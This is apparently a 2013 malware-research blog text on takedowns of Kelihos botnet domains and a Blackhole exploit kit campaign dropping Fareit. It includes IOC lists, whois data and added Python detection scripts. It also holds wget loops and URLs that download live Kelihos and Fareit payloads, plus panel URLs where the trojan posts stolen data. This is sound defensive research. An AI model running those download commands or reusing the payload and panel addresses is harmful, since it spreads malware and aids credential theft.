MYBFABWI.RU,27.49.104.107,
NECUWFEW.RU,94.231.181.24,
NENKUDYF.RU,178.165.23.171,
NICLYCOM.RU,,
NOJQAVYJ.RU,98.193.167.182,
NORWOLLU.RU,178.137.203.149,
NUKUNNOQ.RU,24.49.38.150,
ONSUGNEM.RU,77.85.201.46,
ORNEVKYC.RU,219.70.195.200,
PEXDAJYP.RU,31.128.186.43,
PIVGEVIT.RU,,
PIYMNYFA.RU,46.173.112.16,
POWERWIK.RU,94.244.129.195,
PUPUXHEF.RU,176.8.38.115,
PYDAJZYK.RU,2.68.213.50,
QABADPIX.RU,46.211.63.25,
QOFHIRAW.RU,176.37.121.102,
QYSQUWKO.RU,178.137.72.42,
RIFAUTIR.RU,213.111.69.126,
RIZIKCUG.RU,,
ROVSYMWO.RU,,
RYTEOPBY.RU,89.146.79.57,
SAWSOBCY.RU,,
SOMOXBET.RU,121.129.93.208,
TAFIBCUM.RU,109.87.7.53,
TAZGYVAX.RU,180.110.156.205,
TITGOQTE.RU,189.199.182.2,
TYZFOWFE.RU,,
UWPAYTNU.RU,77.122.227.41,
VEFLOHGY.RU,,
VEKDEGYL.RU,46.173.77.173,
VUZNIQIK.RU,94.230.192.50,
VYFUXTIS.RU,151.0.27.230,
WANZAWBY.RU,212.142.96.18,
WODYFWOD.RU,77.85.201.46,
WORLIPXO.RU,77.121.79.14,
XAKRYXOG.RU,118.160.103.152,
XIMIRSEX.RU,220.137.79.242,
XIMXAMLI.RU,195.24.155.245,
XUGNEMYQ.RU,77.120.179.237,
YFKYTXIX.RU,46.211.85
YFXIGUSO.RU,195.24.155.245,
YGXEYVXI.RU,178.211.139.155,
YJSEYGFY.RU,,
YWHYIWDY.RU,123.236.68.229,
ZADNAZVO.RU,27.6.9.213,
ZUNCUHAK.RU,,
ZUVNENAX.RU,119.14.86.100,
ZUZVAQAW.RU,123.241.73.225,
ZYHIJWIN.RU,178.151.24.58,
ZYRTYDAJ.RU,31.42.119.142,
And the RU domains below are currently under blocking effort with OpenDNS and sinkholing:
EJWOPWYZ.RU,188.27.168.54, ns[1-6].osikkid.com
EKREDTEF.RU,, ns[1-6].osikkid.com
EQGYQTAD.RU,46.250.23.59, ns[1-6].osikkid.com
EVLYLTUX.RU,94.154.224.58, ns[1-6].osikkid.com
FIBLOQAF.RU,, ns[1-6].osikkid.com
FINQIMIG.RU,, ns[1-6].osikkid.com
FOHKYQUW.RU,92.113.255.98, ns[1-6].osikkid.com
FOWAJKUG.RU,, ns[1-6].osikkid.com
FYBYNKEQ.RU,, ns[1-6].osikkid.com
FYDIWGAZ.RU,, ns[1-6].osikkid.com
FYGJUGLI.RU,180.176.172.93, ns[1-6].osikkid.com
FYJTIHOX.RU,, ns[1-6].osikkid.com
FYTUCTOX.RU,, ns[1-6].osikkid.com
GEGDYRAG.RU,, ns[1-6].osikkid.com
GEGMULAD.RU,36.229.82.210, ns[1-6].osikkid.com
GENUVBIZ.RU,, ns[1-6].osikkid.com
GIZROSCA.RU,, ns[1-6].osikkid.com
GUQIDRUV.RU,91.224.168.65, ns[1-6].osikkid.com
HAMOVLOX.RU,, ns[1-6].osikkid.com
HAZLYDUW.RU,85.198.179.73, ns[1-6].osikkid.com
HIHFELGO.RU,, ns[1-6].osikkid.com
HIILOSAB.RU,111.251.91.74, ns[1-6].osikkid.com
HIKKINUF.RU,, ns[1-6].osikkid.com
HOKKINYF.RU,62.231.183.49, ns[1-6].osikkid.com
IVKEUHUW.RU,178.150.244.54, ns[1-6].osikkid.com
IXCUPDAM.RU,124.123.169.123, ns[1-6].osikkid.com
JIBDEFUP.RU,, ns[1-6].osikkid.com
JIXUDRER.RU,, ns[1-6].osikkid.com
JUQUTSAF.RU,112.139.167.48, ns[1-6].osikkid.com
JURLYQYR.RU,129.15.40.86, ns[1-6].osikkid.com
JUVBEBEC.RU,, ns[1-6].osikkid.com
JYHVYCLI.RU,, ns[1-6].osikkid.com
JYSHIWIK.RU,, ns[1-6].osikkid.com
KANRUQYC.RU,, ns[1-6].osikkid.com
KEJIKKIB.RU,77.52.104.119, ns[1-6].osikkid.com
LAWNUPAS.RU,, ns[1-6].osikkid.com
LENEVRYP.RU,, ns[1-6].osikkid.com
LIFNAGCI.RU,, ns[1-6].osikkid.com
LILXAJTE.RU,, ns[1-6].osikkid.com
MEDULZAL.RU,, ns[1-6].osikkid.com
MOJJIQUF.RU,, ns[1-6].osikkid.com
MUBYBLAZ.RU,, ns[1-6].osikkid.com
NADKEWLO.RU,, ns[1-6].osikkid.com
NEQAJDAC.RU,, ns[1-6].osikkid.com
NUJOJPAL.RU,, ns[1-6].osikkid.com
PABOBBAH.RU,, ns[1-6].osikkid.com
PELVOJEL.RU,, ns[1-6].osikkid.com
PEQINNIR.RU,, ns[1-6].osikkid.com
PIGOVFIJ.RU,, ns[1-6].osikkid.com
PYMSILIQ.RU,, ns[1-6].osikkid.com
QAQIQGOD.RU,, ns[1-6].osikkid.com
QEGYRDAD.RU,, ns[1-6].osikkid.com
QEHWOCSI.RU,115.241.91.53, ns[1-6].osikkid.com
RALYMEBU.RU,77.198.70.248, ns[1-6].osikkid.com
RAWPENEP.RU,114.38.44.145, ns[1-6].osikkid.com
RAZCAMIT.RU,37.112.160.119, ns[1-6].osikkid.com
RETUCWYX.RU,, ns[1-6].osikkid.com
RIHSYCVO.RU,213.111.155.5, ns[1-6].osikkid.com
RIZOMCOF.RU,178.74.237.85, ns[1-6].osikkid.com
RYCNISAV.RU,, ns[1-6].osikkid.com
RYGXUQYF.RU,, ns[1-6].osikkid.com
SECZYPRY.RU,46.162.9.40, ns[1-6].osikkid.com
SEPOILOK.RU,, ns[1-6].osikkid.com
SIPVAQBE.RU,188.242.51.78, ns[1-6].osikkid.com
SOKXENBY.RU,37.221.142.107, ns[1-6].osikkid.com
TERUJBIH.RU,, ns[1-6].osikkid.com
TYVWUQAL.RU,, ns[1-6].osikkid.com
UDPYCBEL.RU,, ns[1-6].osikkid.com
UHHUWTEG.RU,, ns[1-6].osikkid.com
UJDOGVIC.RU,, ns[1-6].osikkid.com
UQEBENEW.RU,, ns[1-6].osikkid.com
VESYKVEL.RU,193.107.102.209, ns[1-6].osikkid.com
VUVSIMXO.RU,, ns[1-6].osikkid.com
WYMCEKIN.RU,, ns[1-6].osikkid.com
XUBQOBOH.RU,, ns[1-6].osikkid.com
XUVGYSCI.RU,, ns[1-6].osikkid.com
XYBYHCYZ.RU,, ns[1-6].osikkid.com
XYTFYRSU.RU,, ns[1-6].osikkid.com
ZAGTYCAM.RU,, ns[1-6].osikkid.com
ZEVIJAEF.RU,, ns[1-6].osikkid.com
ZUCFIZME.RU,, ns[1-6].osikkid.com
ZUQTIZYH.RU,, ns[1-6].osikkid.com
ZYCPOHDU.RU,, ns[1-6].osikkid.com
ZYVMYSXA.RU,1.168.215.194, ns[1-6].osikkid.com
Below is the official information received from GroupIB on the SUSPENSION of another 100 Kelihos domains we reported, which was swiftly followed up in less than 48 hours! :-)
Dear Partners,

Group-IB CERT (CERT-GIB) has suspended the following domains:

acbimnik.ru
ajwablet.ru
albodlyc.ru
aqxiwtil.ru
avdicsuw.ru
awpavdog.ru
bevywcoc.ru
bezekqen.ru
bivozhij.ru
cahmydjo.ru
cyjukpym.ru
cyknewyh.ru
cyqsuxon.ru
diijgyan.ru
dyotukci.ru
dyradleq.ru
ejwopwyz.ru
ekredtef.ru
eqgyqtad.ru
evlyltux.ru
fibloqaf.ru
finqimig.ru
fohkyquw.ru
fowajkug.ru
fybynkeq.ru
fydiwgaz.ru
fygjugli.ru
fyjtihox.ru
fytuctox.ru
gegdyrag.ru
gegmulad.ru
genuvbiz.ru
gizrosca.ru
guqidruv.ru
hamovlox.ru
hazlyduw.ru
hihfelgo.ru
hiilosab.ru
hikkinuf.ru
hokkinyf.ru
ivkeuhuw.ru
ixcupdam.ru
jibdefup.ru
jixudrer.ru
juqutsaf.ru
jurlyqyr.ru
juvbebec.ru
jyhvycli.ru
jyshiwik.ru
kanruqyc.ru
kejikkib.ru
lawnupas.ru
lenevryp.ru
lifnagci.ru
lilxajte.ru
medulzal.ru
mojjiquf.ru
mubyblaz.ru
nadkewlo.ru
neqajdac.ru
nujojpal.ru
pabobbah.ru
pelvojel.ru
peqinnir.ru
pigovfij.ru
pymsiliq.ru
qaqiqgod.ru
qegyrdad.ru
qehwocsi.ru
ralymebu.ru
rawpenep.ru
razcamit.ru
retucwyx.ru
rihsycvo.ru
rizomcof.ru
rycnisav.ru
rygxuqyf.ru
seczypry.ru
sepoilok.ru
sipvaqbe.ru
sokxenby.ru
terujbih.ru
tyvwuqal.ru
udpycbel.ru
uhhuwteg.ru
ujdogvic.ru
uqebenew.ru
vesykvel.ru
vuvsimxo.ru
wymcekin.ru
xubqoboh.ru
xuvgysci.ru
xybyhcyz.ru
xytfyrsu.ru
zagtycam.ru
zevijaef.ru
zucfizme.ru
zuqtizyh.ru
zycpohdu.ru
zyvmysxa.ru

3. How we PoC an NS infector in commercial TLD

This is how we always PoC a new infector in the wild. We share this as know-how so everyone can spot and report new infections; our PoC for OSIKKID.COM is as follows:

'(1) Spreads the HLUX as per below checks:'

bash-3.2$ date
Thu Aug 8 12:57:18 JST 2013

// the HLUX IP..

bash-3.2$ while true; do dig +short OSIKKID.COM; sleep 1; done
119.14.28.104
218.166.2.199
125.215.84.135
77.123.42.134
183.72.199.4
36.234.222.167
114.38.198.134
117.197.230.88
95.30.210.87
160.75.9.240
46.250.101.113
175.111.40.232
46.250.99.105
[...]

'(2) Serving Payload malware of Kelihos'
and every A record is serving the Kelihos payload:
// Below is the current download PoC:

bash-3.2$ while true; do wget h00p://OSIKKID.COM/rasta01.exe; sleep 1; done
--2013-08-08 12:59:14-- h00p://osikkid.com/rasta01.exe
Resolving osikkid.com... 89.136.131.41
Connecting to osikkid.com|89.136.131.41|:80... connected.
HTTP request sent, awaiting response... 200
Length: 1221261 (1.2M) []
Saving to: ‘rasta01.exe’
100%
Last-modified header invalid -- time-stamp ignored.
2013-08-08 12:59:22 (260 KB/s) - ‘rasta01.exe’ saved [1221261/1221261]

--2013-08-08 12:59:42-- h00p://osikkid.com/rasta01.exe
Resolving osikkid.com... 124.111.249.204
Connecting to osikkid.com|124.111.249.204|:80... connected.
HTTP request sent, awaiting response... 200
Length: 1221261 (1.2M) []
Saving to: ‘rasta01.exe.2’
Last-modified header invalid -- time-stamp ignored.
2013-08-08 12:59:53 (1003 KB/s) - ‘rasta01.exe.2’ saved [1221261/1221261]
[...]

'(3) INTERNET.BS registration is the current MO.'
The registration process of these domains proves it. We remotely extracted the domains released by the registrar INTERNET.BS from the current day back to June 1st, and this domain is one of them:

bash-3.2$ whois osikkid.com
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: OSIKKID.COM
Registrar: INTERNET.BS CORP.
Whois Server: whois.internet.bs
Referral URL: http://www.internet.bs
Name Server: NS1.OSIKKID.COM
Name Server: NS2.OSIKKID.COM
Name Server: NS3.OSIKKID.COM
Name Server: NS4.OSIKKID.COM
Name Server: NS5.OSIKKID.COM
Name Server: NS6.OSIKKID.COM
Status: clientTransferProhibited
Updated Date: 06-aug-2013
Creation Date: 18-jun-2013
Expiration Date: 18-jun-2014
>>> Last update of whois database: Thu, 08 Aug 2013 04:03:30 UTC <<<

'(4) The linked DNS services used with the previous Kelihos reported NS services:'

The name servers of this domain are linked with the same NS as previously reported:
ns1.OSIKKID.COM = ns3.davujuz.com
ns2.OSIKKID.COM = ns5.ns4, ns2.ns4.ombugew.com
ns3.OSIKKID.COM = ns1.davujuz.com
...and so on...

'(5) The infection raised in RU is caused by the OSIKKID.COM NS server:'
The 100 RU domains need to be blocked, following the same pattern we previously reported to Group IB under REGGI.RU (and FYI, the abuse of .RU by Kelihos is more than 12,000 domains, not including these...)
This is the PoC that the RU domains had been registered under the OSIKKID.COM NS for more than 24 hours:
domain: ACBIMNIK.RU
nserver: ns1.osikkid.com.
nserver: ns2.osikkid.com.
nserver: ns3.osikkid.com.
nserver: ns4.osikkid.com.
nserver: ns5.osikkid.com.
nserver: ns6.osikkid.com.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.08.06
paid-till: 2014.08.06
free-date: 2014.09.06

Below is the check of the reported RU domains affiliated with the OSIKKID.COM NS, cross-referenced by IP and DNS:

ACBIMNIK.RU,, ns1.osikkid.com.
ns2.osikkid.com.
ns3.osikkid.com.
ns4.osikkid.com.
ns5.osikkid.com.
ns6.osikkid.com.
AJWABLET.RU,123.240.108.221, ns1.osikkid.com.
ns2.osikkid.com.
ns3.osikkid.com.
ns4.osikkid.com.
ns5.osikkid.com.
ns6.osikkid.com.
ALBODLYC.RU,, ns1.osikkid.com.
ns2.osikkid.com.
ns3.osikkid.com.
ns4.osikkid.com.
ns5.osikkid.com.
ns6.osikkid.com.
[...]
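Section 3 is, in effect, a three-step check: watch the A answers of a suspect name churn (step 1), pivot on the name servers it shares with domains already reported (steps 4 and 5), and cross-reference the domain lists of section 2 by NS. The script below is an added example, not part of the original post: it does those checks offline by parsing lines in the "DOMAIN,IP, ns[1-6].zone" layout used in the lists above, clustering domains by their NS zone, finding NS hostnames from different zones that share a glue IP (the osikkid.com / davujuz.com equivalence of step 4), and scoring a sequence of A answers for fast-flux-style churn. The record sample is copied from the lists above; the sequence of answers is a constructed subset of the dig output; the glue IPs are TEST-NET placeholders, since the post states the equivalence but not the addresses; and the thresholds in flux_indicators are my own assumption.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample in the same "DOMAIN,IP, nameserver" layout as the lists
# above (a handful of entries copied from those lists).
SAMPLE_RECORDS = """\
ABJIQFIR.RU,188.209.251.38, ns[1-6].karozgi.com
AFEBIRYN.RU,, ns[1-6].karozgi.com
EJWOPWYZ.RU,188.27.168.54, ns[1-6].osikkid.com
EKREDTEF.RU,, ns[1-6].osikkid.com
EQGYQTAD.RU,46.250.23.59, ns[1-6].osikkid.com
"""

# Constructed sample of successive A answers for one name, one per second,
# in the shape of the "dig +short" loop above.
SAMPLE_ANSWERS = [
    "119.14.28.104", "218.166.2.199", "125.215.84.135", "77.123.42.134",
    "183.72.199.4", "36.234.222.167", "114.38.198.134", "117.197.230.88",
]

# Constructed glue records (NS hostname -> IP). The IPs are placeholders from
# the TEST-NET range; the post reports the NS equivalence, not the addresses.
SAMPLE_GLUE = {
    "ns1.osikkid.com": "192.0.2.10",
    "ns3.davujuz.com": "192.0.2.10",
    "ns3.osikkid.com": "192.0.2.11",
    "ns1.davujuz.com": "192.0.2.11",
    "ns1.example.net": "192.0.2.50",
}

RECORD_RE = re.compile(r"^\s*([A-Za-z0-9.-]+),\s*([0-9.]*),\s*(\S+)\s*$")


def parse_records(text):
    """Parse 'DOMAIN,IP, ns[1-6].zone' lines into (domain, ip or None, ns_zone)."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue
        domain, ip, ns = m.groups()
        ns_zone = ns.split(".", 1)[1].lower()   # 'ns[1-6].karozgi.com' -> 'karozgi.com'
        records.append((domain.lower(), ip or None, ns_zone))
    return records


def cluster_by_ns(records):
    """Group infector domains by the zone of the name servers that serve them."""
    clusters = defaultdict(set)
    for domain, _ip, ns_zone in records:
        clusters[ns_zone].add(domain)
    return dict(clusters)


def shared_ns_hosts(glue):
    """Map each IP to the NS hostnames from different zones that share it."""
    by_ip = defaultdict(set)
    for host, ip in glue.items():
        by_ip[ip].add(host)
    return {ip: hosts for ip, hosts in by_ip.items()
            if len({h.split(".", 1)[1] for h in hosts}) > 1}


def flux_indicators(answers, min_ips=5, min_prefixes=3):
    """Summarise how much a sequence of A answers churns, as a fast-flux signal.

    Thresholds are assumptions: a small round-robin pool stays below them,
    a name answering from unrelated networks on every query does not.
    """
    ips = {ipaddress.ip_address(a) for a in answers}
    prefixes = {ipaddress.ip_network(f"{a}/16", strict=False) for a in answers}
    return {
        "answers": len(answers),
        "distinct_ips": len(ips),
        "distinct_prefixes": len(prefixes),
        "fast_flux": len(ips) >= min_ips and len(prefixes) >= min_prefixes,
    }


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for zone, domains in cluster_by_ns(recs).items():
        print(f"{zone}: {len(domains)} domains -> {sorted(domains)}")
    print("shared NS IPs:", shared_ns_hosts(SAMPLE_GLUE))
    print("flux:", flux_indicators(SAMPLE_ANSWERS))
```

The clustering is what makes the NS the useful choke point the post argues for: one suspended NS zone takes every domain in its cluster offline at once, and the shared-glue check shows when a "new" NS zone is just the old infrastructure under another name.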

4. Monitoring The Actual Infection Range

As of today, before the NS sinkholing takes effect, with the great effort of our members we are monitoring 1,287 IP addresses actively distributing the Kelihos malware payload all over the world, as listed in our pastebin here-->>[LINK]

You can append /rasta01.exe after the IP to get the latest Kelihos sample payload for your research purposes, as in the sample below:

The binary file names below can also be used for the same monitoring purpose:

/keybex4.exe
/bljat01.exe
/cuper01.exe
/rasta01.exe
/calc.exe

These infections are plotted in a good graphical interface by Chris J Wilson, as per below:

Infection based per ASN:

Infection based by country:

Prologue

The effort is not stopping now.. see below:

And what a FAST action from our friends!! See the time stamps in the tweets; it is AMAZING to suspend & sinkhole malware domains THAT fast! :-)) (you guys rock!!)
We work hard on trying to break this "Kelihos" legend methodically, and the method works!
Don't ever let the Kelihos scum enter the internet! Spot & stop them instantly; cooperate with the abused registrar to get the new infectors sent to sinkholes and to suspend those new domains instantly.
Their weakness is in their DNS: these services are the backbone of their payload distribution across thousands of IPs and infector domains, and those DNS servers use static addresses on machines that cannot be removed. This IS a target to be shut down!
Thus, DO NOT let those NS get any domains on our internet! It is not easy for them to shift their DNS; it hurts them very badly, and they just change the name server domains time after time. Right now they need non-RU domains for their DNS so their botnet survives longer.
Let's build the procedure to SPOT, BLOCK, SUSPEND & CLEAN UP in one flow altogether!
We need your help and your support in coordination with the Kelihos botnet suppression effort. Please cooperate!

#MalwareMustDie!

How Greedy Cyber Scums are.. Leaked Spam Plan & Triple Payload Hits of "Syria Campaign"

We had been in good undercover coordination on fighting a comeback botnet (still on it-->HERE) when we spotted this threat. It is related to a recent event and to malvertisement, so I thought it better to share this information. On September 1st, 2013, during our monitoring, we intercepted a communication from one scum to another, with the following message:
After evaluating the authenticity of the message and understanding the specific spam template used and the urgency of the threat, we sent a "check your perimeter" warning to every group of researchers we could reach. This is definitely a spooky encouragement message for an attack that the ring of cyber scum was going to launch.

In early September some of our friends started to spot (i.e.-->HERE) the related threat, and on September 7th I personally received the sample in my honeypot, as per the full email snapshot below:

The email header shows the following data:

It shows us a 100% plastic surgery of faked relay data. If I may explain: on the first line it fakes the facebook envelope-from data (normally obtained via HELO), supported by line #7, the fake SMTP HELO communication trace. We also see the fake email client signature in the "User-Agent" header; we have seen this fake MUA data in many BHEK spams before too.

We also see fake local network relay data with a lame Message-ID generated by a fake Microsoft SMTP server. Why is it lame? Because they use the same strings in most of the similar spams sent recently. Furthermore, you will see that lines 7 & 9 carry the IP address 2.180.28.90, which in my opinion is not close to reality either, judging by the lookups below that end up in an Iran/Tehran network, which reminds me of the DoD network case (link-->HERE) faked by the same malvertisement:

inetnum:        2.180.16.0 - 2.180.63.255
netname: tckhr-DSL
descr: Telecommunication Company of Khorasan Razavi for ADSL users
country: IR
admin-c: JS10218-RIPE
tech-c: JS10218-RIPE
status: ASSIGNED PA
mnt-by: AS12880-MNT
source: RIPE # Filtered

person: Jamil Sabaghi
address: Khomeini ST Mashhad Iran
phone: +98 511 604 44 40
nic-hdl: JS10218-RIPE
mnt-by: AS12880-MNT
source: RIPE # Filtered
But there is still the possibility of a machine infected by a SpamBot at that address; that is for the local authority to check, since I won't be fooled by this scum and have no interest in firing my nmap in that direction during this "heated" political season. BTW, the "faking" of the Message-ID (see no. 3) and the fake MUA data (no. 4) are typical SpamBot work; we suspect a Cutwail spambot template.

The email has one link pointing to a malicious infector site. As shown at the bottom of the email snapshot above, the domain name hosannacapital.com.pa is a recently well-known Blackhole infector URL of a hacked site with a long history of Blackhole infection during the past months-->HERE; the Robtex diagram below proves the dedicated usage of the IP, supporting that theory:

Still, the infection coming from this IP (72.47.232.23) is quite rapid, so it will do you no harm to block the IP address and the domains below to prevent infections:

hosannacapital.com.pa
hosannavision.org
imap.hosannavision.org
mail.hosannavision.com
mail.www.hosannavision.org
pop.www.hosannavision.org
smtp.hosannavision.com
smtp.hosannavision.org
smtp.www.hosannavision.org

Back to the timeline of infection: a good report by the Umbrella Security Graph tool gave me the first occurrence and the peak of the current threat's infection via the infector domains, as follows:

This explains the timing of the infection accesses from PCs, which matches the malvertisement used.

Moving on, back to the URL of the infector, which ends up containing links to multiple .JS javascript files coded in the index.html (the usual BHEK infector scheme). We have gone through the same write-up dozens of times, so I am not going into details here; in short, inside the .JS files is written one single link that ends up at the Blackhole Exploit Kit landing page below:

luggagepreview .com/topic/able_disturb_planning.php
Again, to confirm the infection timing, I checked the landing page domain's DNS query requests via Umbrella Security Graph below:

The result suggests to me this malvertisement "possibility" of the infection's timeline.

Looking further into the IP address used for this Blackhole in passive DNS, another 12 domains on the same IP were recorded as having malware requests, as detailed below (I share this for blocking purposes, in case you don't have it yet):

londonleatheronline.com
londonleatherusa.com
luggage-tv.com
luggagecast.com
luggagepreview.com
dai-li.info
dyweb.info
expopro.info
luggagejc.com
luggagepoint.de
luggagewalla.com
yesrgood.info
Well OK, then what does this BHEK do?

The Story of Exploitation and Infection

I used the applet access method that must have been written in the landing page to make it guide me to the exploit infector. I picked this method since I know Java infection is kind of "HOT" in the recent BHEK trend, hoping to see some new stuff to break. Tweaking your preferred fetcher, you'll get this jar if you do it right; my log as PoC:

  :
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 09 Sep 2013 07:01:51 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 22553
X-Powered-By: PHP/5.3.14-1~dotdeb.0
ETag: "e21e49a30bd84a1d042602ba446aceb0"
Last-Modified: Mon, 09 Sep 2013 07:04:00 GMT
Accept-Ranges: bytes
:
200 OK
Length: 22553 (22K) [application/java-archive]
Saving to: `java1.jar'
2013-09-09 16:05:27 (70.8 KB/s) - `java1.jar' saved [22553/22553]
As I expected, low detection in VT -->LINK
URL: https://www.virustotal.com/en/file/20811157e12152bd262710b5b743ddf60857c3cd157e4f64ea2e6f4fd8ee8eaf/analysis/1378711326/
SHA256: 20811157e12152bd262710b5b743ddf60857c3cd157e4f64ea2e6f4fd8ee8eaf
SHA1: 370acfc6bf26d9e4761586cc634382a517e4baaf
MD5: e21e49a30bd84a1d042602ba446aceb0
File size: 22.0 KB ( 22553 bytes )
File name: java1.jar
File type: ZIP
Detection ratio: 4 / 47
Analysis date: 2013-09-09 07:22:06 UTC ( 0 minutes ago )

Kaspersky UDS:DangerousObject.Multi.Generic
McAfee Suspect-BO!Exploit-JAR
McAfee-GW-Ed. Suspect-BO!Exploit-JAR
Sophos Mal/ExpJava-U
I had my fun decompiling this jar, running into the error below:

Yes, it is supposed to prevent decompilation (see this reference-->HERE), which made me bump into the interesting concept of applet loading within Main.class:

In short, after some hours of manual decoding to solve the strings one by one, I burped the strings below, which confirm this jar as CVE-2013-0422; your reference is -->HERE
com.sun.jmx.mbeanserver.Introspector
javax.management.MbeanServerDelegateboolean
getMBeanInstantiator
com.sun.jmx.mbeanserver.JmxMBeanServer
newMBeanServer
↑This is at least what I fetched via my method; there could be other jars with other CVEs too. I must say some comments up to this moment: the obfuscation method of this jar is not one I commonly see, loading the applet object from a class, the anti-debugging function, the horrible obfuscation. Without a pcap to help guide me in testing some results, I don't think I could have managed to crack this one in such a short time..

Anyway, the post is long, so let's move on. To my deeper disappointment, this is all only to burp the very well-known fake Adobe URL below :-/ - sorry, I can't expose more than this at the moment.

[domain][root-dir] /adobe/update_flash_player .exe 

The Payload Story

Fetching the first-level payload was a tricky effort. Forget the URLQuery tricks; it doesn't work that way. You must follow the route of infection I described above closely to put in the correct parameters to fetch this payload; then you will get this:

GET /adobe/update_flash_player.exe HTTP/1.0
Host: luggagepreview.com
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 09 Sep 2013 07:27:08 GMT
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 115712
Last-Modified: Mon, 09 Sep 2013 07:25:01 GMT
Accept-Ranges: bytes
:
200 OK
Length: 115712 (113K) [application/octet-stream]
Saving to: `update_flash_player.exe'
2013-09-09 16:31:12 (3.99 KB/s) - `update_flash_player.exe' saved [115712/115712]
The payload is the Trojan PWS Win32/Fareit, and by reversing it we can figure out the URLs of the other malware to be downloaded by this trojan:
h00p://imagesuperspot.com/6ptP.exe
h00p://1954f7e942e67bc1.lolipop.jp/d2z.exe
h00p://ropapublicitaria.es/5VWumA1.exe
h00p://colombiantravelservices.com/ucUMruv.exe
and it posts the infected PC's data to the panels below:
h00p://luxurybrandswalla.com/forum/viewtopic.php
h00p://mickmicheyl.biz/forum/viewtopic.php
h00p://mickmicheyl.ca/forum/viewtopic.php
h00p://mickmicheyl.com/forum/viewtopic.php
↑Please look at the domains above carefully. We have well-known findings of the fake Adobe updater served from these URLs well beforehand:
mickmicheyl .biz/chrome
mickmicheyl .biz/adobe
mickmicheyl .ca/chrome
mickmicheyl .ca/adobe
mickmicheyl .com/chrome
mickmicheyl .com/adobe
luxurybrandswalla .com/chrome
luxurybrandswalla .com/adobe
The HTTP headers used for download follow this template:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s
and the POST command uses this template:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
GetNativeSystemInfo
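The two request templates above are a compact network signature for this Fareit build, because they are fixed strings in the binary rather than whatever the host's own browser would send. The checker below is an added example, not code from the post or from the malware: it parses a raw HTTP request and counts the template features it shares (the exact User-Agent, the MSIE 8.0 plus Trident/5.0 pairing, HTTP/1.0, the Accept-Encoding value, and for POSTs the octet-stream body, Content-Encoding: binary and the /forum/viewtopic.php panel path), and carries a regex for the HWID GUID format shown in the template. The two sample requests are constructed (the panel host is one of the domains listed above; the benign request is made up), and the alert threshold of four features is my assumption.

```python
import re

FAREIT_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"

# Constructed sample requests. The first is shaped like the POST template
# above (host/path taken from the panel list on this page); the second is an
# ordinary browser request for contrast.
SAMPLE_POST = """\
POST /forum/viewtopic.php HTTP/1.0
Host: mickmicheyl.biz
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 512
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
"""

SAMPLE_BENIGN = """\
GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
"""

# {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} from the template above
HWID_RE = re.compile(r"\{[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}")


def parse_request(raw):
    """Split a raw request (request line plus headers) into its parts."""
    lines = raw.strip().splitlines()
    method, path, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def fareit_indicators(raw):
    """Return the template features a request shares with the GET/POST above."""
    method, path, version, h = parse_request(raw)
    hits = []
    ua = h.get("user-agent", "")
    if ua == FAREIT_UA:
        hits.append("exact-template-ua")
    # IE8 advertises Trident/4.0; Trident/5.0 is the IE9 engine token, so the
    # template's MSIE 8.0 + Trident/5.0 pairing never comes from a real IE8.
    if "MSIE 8.0" in ua and "Trident/5.0" in ua:
        hits.append("msie8-trident5-mismatch")
    if version == "HTTP/1.0":
        hits.append("http-1.0")
    if h.get("accept-encoding") == "identity, *;q=0":
        hits.append("template-accept-encoding")
    if method == "POST":
        if h.get("content-type") == "application/octet-stream":
            hits.append("octet-stream-post")
        if h.get("content-encoding") == "binary":
            hits.append("content-encoding-binary")
        if path.endswith("/forum/viewtopic.php"):
            hits.append("viewtopic-panel-path")
    return hits


def looks_like_fareit(raw, threshold=4):
    """True when enough template features line up to be worth an alert (threshold is assumed)."""
    return len(fareit_indicators(raw)) >= threshold


def hwid_in_body(body):
    """Find a Fareit-style HWID GUID in posted data, or None."""
    m = HWID_RE.search(body)
    return m.group(0) if m else None


if __name__ == "__main__":
    for name, req in (("post", SAMPLE_POST), ("benign", SAMPLE_BENIGN)):
        print(name, looks_like_fareit(req), fareit_indicators(req))
    print(hwid_in_body("HWID {0123ABCD-1234-5678-9ABC-DEF012345678} ..."))
```

Matching on the combination rather than on the User-Agent alone keeps false positives down: any one header value can occur in legitimate traffic, but a HTTP/1.0 POST with an octet-stream body, Content-Encoding: binary and that exact UA to a viewtopic.php path is the template and nothing else.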
The Virus Total scan result of this payload: -->LINK
